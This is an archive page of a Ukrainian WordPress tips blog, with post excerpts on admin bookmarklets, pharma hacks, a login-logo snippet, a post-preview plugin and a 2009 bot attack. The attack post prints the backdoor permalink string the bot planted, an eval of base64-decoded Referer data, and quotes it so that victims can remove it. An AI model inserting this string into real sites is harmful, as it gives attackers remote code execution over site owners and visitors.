sitemap archive

Букмарклети для швидкого доступу в адмінку WordPress’у

в категорії wordpress фішки

теги :

Мені щодня приходиться відкривати купу різних сайтів, зроблених на wordpress'і і так само часто приходиться заходити в адмінки цих сайтів. Раніше доводилось щоразу копіювати адресу сайту, відкривати нову вкладку, вставляти адресу сайту і потім дописувати /wp-admin в кінці адреси. Це довго, нудно і не по-самурайськи. Тому я зайнявся вирішенням цієї проблеми і написав універсальні букмарклети, які відкриватимуть вам сторінку адмінки.

Щоб додати букмарклет, просто перетягніть його звідси на панель закладок вашого браузера.
Wp-admin відкриє адмінку в поточному табі, а wp-admin* відкриє адмінку в новому табі. Вибирайте, що кому більше подобається.

WP-ADMIN WP-ADMIN*

Єдиний недолік в тому, що букмарклет не буде працювати коректно, якщо використовувати на WordPress Multisite де сайти розташовуються в підпапках, а не на субдоменах. Ну і якщо сам вордпрес встановлено в підпапку (наприклад в /blog/), а не в корінь сайту, то букмарклет також працювати не буде, але процент таких сайтів дуже малий.

Якщо виникли якісь питання з цього приводу — питайте, не зволікайте :)

Post to Twitter

І знову про захист сайту від зламу

в категорії wordpress фішки

теги :

Останнім часом до мене все частіше почали звертатись клієнти з підозрами на взламані сайти на wordpress'i. Якщо ви також помітили щось підозріле в роботі свого сайту, то ця стаття для вас.

Помітити, що сайт взламаний не завжди вдається. Ось у мене був випадок, коли клієнт чисто випадково помітив, що на його сайті внизу були сторонні посилання на сайти з продажу ліків. В інтернеті це називається pharma hack. Але щоб виявити, що ваш сайт заражений цим "вірусом" потрібно його відвідати, але з певними умовами:
— це має бути захід через гугл по пошуковій фразі
— з цієї ip-адреси ви ще жодного разу не заходили на свій сайт
— з цього броузера ви ще жодного разу не заходили на свій сайт (або почистити кукі).
Саме через те, що "лєві" посилання показуються лише при цих умовах, власники сайтів навіть не здогадуються, що їх сайт був зламаний.

Але якщо ви так і не виявили сторонніх посилань на сайті, то не спішіть радіти, ваш сайт може бути взламаний іншим чином і може містити руткіт, або бути учасником бот-мережі. Ці проблеми не є новими, тож в якості протидії їм розробники різних мастей зробили купу плагінів, що покривають ті чи інші аспекти по підвищенню захищеності сайту. Я ж розповім про те, які плагіни обрав сам і рекомендую іншим. почитати продовження →

Post to Twitter

Десяток корисних хаків для WordPress

в категорії wordpress фішки

теги :

Вирішив зібрати колекцію хаків та фішок, які я останнім часом часто використовую при створенні сайтів на WordPress.

Брендована адмінка.

Задача: Зробити вивід власного логотипу замість логотипу WordPress на сторінці логіну в адмінку, та в заголовку адмінки.

Для виводу логотипу на сторінці логіну зкопіюйте цей код в файл functions.php вашої теми:

function my_custom_login_logo() {
    echo '<style type="text/css">
        html {background-color:#001721;}
        h1 a { background-image:url('.get_bloginfo('template_directory').'/images/logo.png) !important; } </style>';
}

add_action('login_head', 'my_custom_login_logo');

Цим самим ви замінюєте вивід логотипа на власний logo.png , що знаходиться в папці images вашої поточної теми. Як бачите, зміни стосуються лише css'у і ви можете туди додати ще свої стилі для інших елементів (я, наприклад, ще люблю поміняти фон під фірмові кольори та тінь додати яскравого кольору, щоб було як ефект м’ягкої підсвітки)

Ось приклади таких сторінок логіну:

А ось код, що змінить логотип в заголовку адмінки:

почитати продовження →

Post to Twitter

Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!

в категорії wordpress фішки

теги :

Українською

Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.

захищаєм блог від хакерівТак в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.

І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)

А тим, хто вже пострадав від цього віруса, черв'яка, бота (називайте як хочете) потрібно зробити:

  • В налаштуваннях ЧПУ, поміняти з
    /%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
    на
    /%postname%/
    (у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))
  • Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
  • Оновити WordPress до версії 2.8.4

Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу

Post to Twitter

Викинь візуальний редактор! Є ж плагін Post Preview від Dimox’a

в категорії wordpress фішки

теги :

Як мене дістав візуальний редактор TinyMCE, що включений в WordPress по-замовчуванню. Я не спорю, для чайників краще писати пости в візуальних редакторах, але мене просто бісить та кількість надлишкового коду, що формують візуальні редактори і те, що вони інколи такі „коники“ викидають в коді, що диву даєшься, як він міг до такого додуматись, особливо, коли пробуєш в ньому робити табличні дані з малюнками та списками всередині.

В черговий раз, коли візуальний редактор вибрикнувся, я написав в твіттер: «Ну чого, ніхто, до сих пір, не зробив плагіну, який би вимкнув візуальний редактор і замість нього втиснути попередній перегляд поста?». І вже вкотре, спрацювала «сила твіттера» — на мій твіт відгукнувся Dimox — наворочений верстальщик, майстер css'у. Ми обговорили деталі і він сказав, що залюбки зробить цей плагін на Jquery. Сказано — зроблено! Через тиждень він мені прислав першу версію плагіну — з тих пір я викинув візуальний редактор.

А сьогодні Dimox написав про цей плагін в пості: WordPress-плагин “Предпросмотр поста в админке” на jQuery
Якщо вам теж не байдуже, що твориться в вашому коді, або ви євангеліст-маньяк w3c стандартів, який ніколи не признавав візуальних редакторів, то вам цей плагін теж прийдеться до душі:

Скачати Jquery Post Preview Скачати плагін jQuery Post Preview

Встановлення плагіну:

  • Зкопіювати папку jquery-post-preview в папку с плагінами: /wp-content/plugins/.
  • Активувати плагін в адмінці WordPress
  • Вимкнути візуальний редактор в налаштуваннях профілю користувача.

Ось і все! Тепер вся сила HTML та CSS в ваших руках і ніхто вам не зіпсує ідеально форматований код. А якщо вам не вистачає якихось кнопок, що були в візуальному редакторі то їх легко можна додати завдяки плагіну addquicktags:

Скачати AddQuickTags Скачати плагін AddQuickTags

Я за допомогою цього плагіну додав кнопки для H3 та img (малюнка стрілочки завантаження).
Ось так із, мимоходом, кинутої репліки в твіттер, на світ появився новий корисний плагін для WordPress'у. Спасибі Dimox ;)

p.s. А ще я намалював кнопочки для GoogleReader та Яндекс.Лєнти (он там в сайдбарі, наверху видно). Як вони вам?

Post to Twitter

LilumiМене звати LiluMi, а це мій блоґ. Тут про веб-розробку та лайфхаки. Рекомендую підписатись на RSS Інформацію про мене читайте на сторінці me LiluMi
UA TOP Bloggers
Рейтинг блогов Рейтинг блога lilumi.org.ua Рейтинг блогов



Тобі передають привіт 68 медвежаток. Це підняло тобі настрій на 0,978 а в Австралії живе колібрі у якої дзьобик довжиною на 41.22см.